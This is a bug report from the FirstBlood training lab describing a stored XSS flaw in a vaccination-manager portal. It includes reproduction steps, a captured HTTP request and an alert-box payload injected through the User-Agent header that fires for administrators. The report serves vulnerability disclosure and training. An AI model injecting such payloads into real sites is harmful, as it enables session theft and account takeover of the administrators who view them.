FirstBlood-#917The User Agent parameter is vulnerable to XSS in the vaccination-manager portal.
This issue was discovered on FirstBlood v2

On 2021-10-30, vigilante Level 4 reported:


The vaccination-manager portal is showing a number of fields, one of which is "User Agent".

I kept trying for XSS in the email address and in the end, noticed that the "User Agent" field doesn't do any filtering.

Steps to Reproduce:

  1. Navigate to /vaccination-manager/login.php and login to the portal. (I reported how in a previous bug)
  2. Keep the portal open and upload a new proof of vaccination.
  3. Capture the request with Burp and modify the User Agent by adding an XSS payload to it <svg\/onload=alert1>.
POST /vaccination-manager/pub/submit-vaccination-proof.php HTTP/1.1
Cookie: vaccination_manager=1169e091578618a592da0af78e85defa2760148f89bff98baf1aea6e22226668; doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=a1591376de74895e99a25819f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0<svg/onload=alert`1`>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13249935105080366202509426831
Content-Length: 16725
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Content-Disposition: form-data; name="email"

[email protected]
Content-Disposition: form-data; name="vaccination_proof"; filename="systembash.jpg"
Content-Type: image/jpeg

  1. Refresh the vaccine-manager portal, you will see an XSS pop up.


We are able to execute javascript in the victims' browser.

P2 High

Endpoint: /vaccination-manager/pub/submit-vaccination-proof.php

Parameter: User Agent

Payload: <svg\/onload=alert`1`>

FirstBlood ID: 29
Vulnerability Type: Stored XSS

When uploading a vaccine proof it is possible to achieve stored XSS against admins set via the user agent. As this value typically can't be user controlled the developers did not think it was 'worth' preventing against XSS.